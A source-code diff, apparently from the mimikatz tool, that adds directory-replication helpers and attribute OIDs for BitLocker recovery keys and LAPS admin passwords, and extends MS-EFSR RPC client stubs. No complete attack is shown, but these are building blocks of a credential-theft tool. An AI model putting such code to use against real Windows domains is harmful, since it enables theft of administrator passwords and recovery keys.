 	ATTRVALBLOCK *ptr = NULL;
 	DWORD i;
 	ATTR *attribut;
+
+	for(i = 0; i < attributes->attrCount; i++)
+	{
+		attribut = &attributes->pAttr[i];
+		if(attribut->attrTyp == type)
+		{
+			ptr = &attribut->AttrVal;
+			break;
+		}
+	}
+
+	return ptr;
+}
+
+ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
+{
+	ATTRVALBLOCK *ptr = NULL;
 	ATTRTYP type;
 	if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
 	{
-		for(i = 0; i < attributes->attrCount; i++)
-		{
-			attribut = &attributes->pAttr[i];
-			if(attribut->attrTyp == type)
-			{
-				ptr = &attribut->AttrVal;
-				break;
-			}
-		}
+		ptr = kull_m_rpc_drsr_findAttrNoOID(attributes, type);
 	}
 	else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
 	return ptr;
@ -605,6 +616,31 @@ PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *
 	return ptr;
 }

+PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size)
+{
+	PVOID ptr = NULL;
+	ATTRVALBLOCK *valblock;
+
+	if(data)
+		*(PVOID *)data = NULL;
+	if(size)
+		*size = 0;
+	
+	if(valblock = kull_m_rpc_drsr_findAttrNoOID(attributes, type))
+	{
+		if(valblock->valCount == 1)
+		{
+			ptr = valblock->pAVal[0].pVal;
+			if(data)
+				*(PVOID *)data = ptr;
+			if(size)
+				*size = valblock->pAVal[0].valLen;
+		}
+	}
+	return ptr;
+}
+
+
 void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
 {
 	PVOID ptr;
--- a/modules/rpc/kull_m_rpc_drsr.h
+++ b/modules/rpc/kull_m_rpc_drsr.h
@ -188,6 +188,16 @@ typedef enum {
 #define szOID_ANSI_lmPwdHistory				"1.2.840.113556.1.4.160"
 #define szOID_ANSI_supplementalCredentials	"1.2.840.113556.1.4.125"

+// bitlocker
+#define szOID_ANSI_msFVERecoveryPassword	"1.2.840.113556.1.4.1964"
+#define szOID_ANSI_msFVERecoveryGuid		"1.2.840.113556.1.4.1965"
+#define szOID_ANSI_msFVEVolumeGuid			"1.2.840.113556.1.4.1998"
+#define szOID_ANSI_msFVEKeyPackage			"1.2.840.113556.1.4.1999"
+
+// LAPS
+#define szOID_ANSI_msMcsAdmPwd				"1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.1"
+#define szOID_ANSI_msMcsAdmPwdExpirationTime	"1.2.840.113556.1.8000.2554.50051.45980.28112.18903.35903.6685103.1224907.2.2"
+
 #define szOID_ANSI_trustPartner				"1.2.840.113556.1.4.133"
 #define szOID_ANSI_trustAuthIncoming		"1.2.840.113556.1.4.129"
 #define szOID_ANSI_trustAuthOutgoing		"1.2.840.113556.1.4.135"
@ -257,8 +267,10 @@ void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTa
 LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
 BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);

+ATTRVALBLOCK * kull_m_rpc_drsr_findAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type);
 ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
 PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
+PVOID kull_m_rpc_drsr_findMonoAttrNoOID(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
 void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);

 LPWSTR kull_m_rpc_drsr_MakeSpnWithGUID(LPCGUID ServClass, LPCWSTR ServName, LPCGUID InstName);
--- a/modules/rpc/kull_m_rpc_ms-efsr.h
+++ b/modules/rpc/kull_m_rpc_ms-efsr.h
@ -1,11 +1,27 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
 #pragma once
 #include "kull_m_rpc.h"

-const UUID EFSR_ObjectUUID;
+extern const UUID EFSR_ObjectUUID;

 typedef void *PEXIMPORT_CONTEXT_HANDLE;

-long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags);
-void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext);
+typedef struct pipe_EFS_EXIM_PIPE {
+	void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount);
+	void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount);
+	void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount);
+	char* state;
+} EFS_EXIM_PIPE;

-extern RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
+long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags);
+long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe);
+long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe);
+void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext);
+long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName);
+long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag);
+
+RPC_IF_HANDLE efsrpc_v1_0_c_ifspec;
--- a/modules/rpc/kull_m_rpc_ms-efsr_c.c
+++ b/modules/rpc/kull_m_rpc_ms-efsr_c.c
@ -1,75 +1,104 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	benjamin@gentilkiwi.com
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
 #include "kull_m_rpc_ms-efsr.h"

 const UUID EFSR_ObjectUUID = {0xdf1941c5, 0xfe89, 0x4e79, {0xbf, 0x10, 0x46, 0x36, 0x57, 0xac, 0xf4, 0x4d}};

 #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
-typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
-	SHORT Pad;
-	UCHAR Format[23];
-} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
-
-typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
-	SHORT Pad;
-	UCHAR Format[93];
-} ms2Defsr_MIDL_PROC_FORMAT_STRING;
-
-extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
-extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
-static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
-RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
-static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
-static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
-
-long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
-{
-	return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], binding_h, hContext, FileName, Flags).Simple;
-}
-void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
-{
-	NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[54], hContext);
-}
-
-static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
-	0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
-	0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x08, 0x00,
-	0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
-}};
-static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
-	0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
-}};
+extern const UCHAR ms2Defsr__MIDL_ProcFormatString[283];
 #elif defined(_M_IX86)
-typedef struct _ms2Defsr_MIDL_TYPE_FORMAT_STRING {
-	SHORT Pad;
-	UCHAR Format[23];
-} ms2Defsr_MIDL_TYPE_FORMAT_STRING;
+extern const UCHAR ms2Defsr__MIDL_ProcFormatString[271];
+#endif
+extern const UCHAR ms2Defsr__MIDL_TypeFormatString[55];

-typedef struct _ms2Defsr_MIDL_PROC_FORMAT_STRING {
-	SHORT Pad;
-	UCHAR Format[89];
-} ms2Defsr_MIDL_PROC_FORMAT_STRING;
+const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, NDR_TSI_20, 0, 0, NULL, 0, 0, 0x00000001};
+RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)&efsrpc___RpcClientInterface;
+RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
+const MIDL_STUB_DESC efsrpc_StubDesc = {(void *) &efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};

-extern const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString;
-extern const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString;
-static const RPC_CLIENT_INTERFACE efsrpc___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xc681d488, 0xd850, 0x11d0, {0x8c, 0x52, 0x00, 0xc0, 0x4f, 0xd9, 0x0f, 0x7e}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000001};
-RPC_IF_HANDLE efsrpc_v1_0_c_ifspec = (RPC_IF_HANDLE)& efsrpc___RpcClientInterface;
-static RPC_BINDING_HANDLE efsrpc__MIDL_AutoBindHandle;
-static const MIDL_STUB_DESC efsrpc_StubDesc = {(void *)& efsrpc___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &efsrpc__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Defsr__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
-#pragma optimize("", off) 
-long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE *hContext, wchar_t *FileName, long Flags)
+#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
+long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
 {
-    return (long) NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[0], (unsigned char *) &binding_h).Simple;
+    return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, binding_h, hContext, FileName, Flags).Simple;
+}
+long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
+{
+    return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 54, hContext, EfsOutPipe).Simple;
+}
+long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
+{
+    return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 104, hContext, EfsInPipe).Simple;
+}
+void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext)
+{
+    NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 154, hContext);
+}
+long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
+{
+    return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 192, binding_h, FileName).Simple;
+}
+long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
+{
+	return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 234, binding_h, FileName, OpenFlag).Simple;
+}
+
+const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
+	0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01,
+	0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00,
+	0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x08, 0x00,
+	0x18, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x18, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x0a, 0x01,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x08, 0x00, 0x26, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,
+	0x03, 0x00, 0x08, 0x00, 0x30, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00,
+	0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x18, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01,
+	0x08, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x20, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x0a, 0x01,
+	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x10, 0x00, 0x08, 0x00, 0x70, 0x00, 0x18, 0x00, 0x08, 0x00, 0x00,
+};
+#elif defined(_M_IX86)
+#pragma optimize("", off) 
+#pragma warning(push)
+#pragma warning(disable:4100)
+long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags)
+{
+    return (long) NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 0, &binding_h).Simple;
+}
+long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe)
+{
+	return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 52, &hContext).Simple;
+}
+long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe)
+{
+	return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 100, &hContext).Simple;
 }
 void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE *hContext)
 {
-	NdrClientCall2((PMIDL_STUB_DESC) &efsrpc_StubDesc, (PFORMAT_STRING) &ms2Defsr__MIDL_ProcFormatString.Format[52], (unsigned char *) &hContext);
+	NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 148, &hContext);
 }
+long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName)
+{
+	return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 184, &binding_h).Simple;
+}
+long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag)
+{
+	return (long)NdrClientCall2(&efsrpc_StubDesc, ms2Defsr__MIDL_ProcFormatString + 224, &binding_h).Simple;
+}
+#pragma warning(pop)
 #pragma optimize("", on)
-static const ms2Defsr_MIDL_PROC_FORMAT_STRING ms2Defsr__MIDL_ProcFormatString = {0, {
+const UCHAR ms2Defsr__MIDL_ProcFormatString[] = {
 	0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00,
-	0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
-	0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x12, 0x00, 0x00,
-}};
-static const ms2Defsr_MIDL_TYPE_FORMAT_STRING ms2Defsr__MIDL_TypeFormatString = {0, {
-	0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
-}};
-#endif
+	0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0c, 0x00, 0x30, 0x40,
+	0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x14, 0x41, 0x04, 0x00, 0x18, 0x00, 0x70, 0x00,
+	0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x0c, 0x00, 0x30, 0x40, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x08, 0x00, 0x4c, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00,
+	0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x0c, 0x01, 0x04, 0x00, 0x26, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x04, 0x00, 0x30, 0xe0,
+	0x00, 0x00, 0x00, 0x00, 0x38, 0x00, 0x38, 0x00, 0x40, 0x01, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x32, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
+	0x0c, 0x00, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x46, 0x02, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00, 0x0c, 0x00, 0x70, 0x00, 0x08, 0x00, 0x08, 0x00,
+	0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x10, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x08, 0x00, 0x46, 0x03, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0b, 0x01, 0x04, 0x00,
+	0x0c, 0x00, 0x48, 0x00, 0x08, 0x00, 0x08, 0x00, 0x70, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x00, 
+};
+#endif
+const UCHAR ms2Defsr__MIDL_TypeFormatString[] = {
+	0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x30, 0x41, 0x00, 0x00, 0x11, 0x04, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00,
+	0x11, 0x00, 0x04, 0x00, 0x02, 0x5c, 0xb5, 0x00, 0xfc, 0xff, 0x01, 0x00, 0x01, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xe1, 0x00, 0x00, 0x00,
+};